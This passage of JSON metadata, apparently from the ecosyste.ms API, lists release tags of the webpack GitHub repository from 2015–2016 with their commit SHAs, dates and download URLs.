Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/